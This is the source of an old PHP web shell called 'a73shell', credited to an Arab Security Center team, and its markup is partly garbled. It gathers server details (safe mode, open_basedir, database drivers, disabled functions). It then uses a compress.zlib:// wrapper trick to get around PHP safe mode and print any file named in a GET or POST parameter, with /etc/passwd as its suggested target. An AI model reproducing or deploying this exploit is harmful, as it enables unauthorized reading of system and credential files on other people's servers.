|
j a73shell
v.0
Bypass |
Arab Security Center
Team &n
bsp; &n
bsp;
2005-2006
October73 Coded
By:Super-Crystal &
;nbsp;
|
uname -a:
ID:
Dir:
|
SOFTWARE:
Safe-mode:
|
Arab4Services.Com
mail: ooloo605@hotmail.com
Safe Mode
Shell";
$tymczas="./"; // Set $tymczas to dir where you have 777
like /var/tmp
if (@ini_get("safe_mode") or
strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "ON
(secure)";
}
else {$safemode = false; $hsafemode = "OFF (not secure)";}
echo("Safe-mode: $hsafemode");
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true;
$hopenbasedir = "".$v."";}
else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}
echo("
");
echo("Open base dir: $hopenbasedir");
echo("
");
echo "PostgreSQL: ";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "ON";}else{echo
"OFF";}
echo("
");
echo "MSSQL: ";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "ON";}else{echo
"OFF";}
echo("
");
echo "MySQL: ";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "ON";
} else { echo "OFF"; }
echo("
");
echo "PHP version:
".@phpversion()."";
echo("
");
echo "cURL: ".(($curl_on)?("ON"):("OFF"));
echo("
");
echo "Disable functions : ";
if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo
"$df";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
echo "\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file
POST, GET like
?file=/etc/passwd\n Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
Exploit");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "--- Start File
".htmlspecialchars($file)."
-------------\n".htmlspecialchars($tekst)."\n<
;B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\nFile
".htmlspecialchars($file)." has been already loaded.
SecurityReason Team
;]");
} else {
die("Sorry...
File
".htmlspecialchars($file)." dosen't
exists or you don't have
access.");
}
?>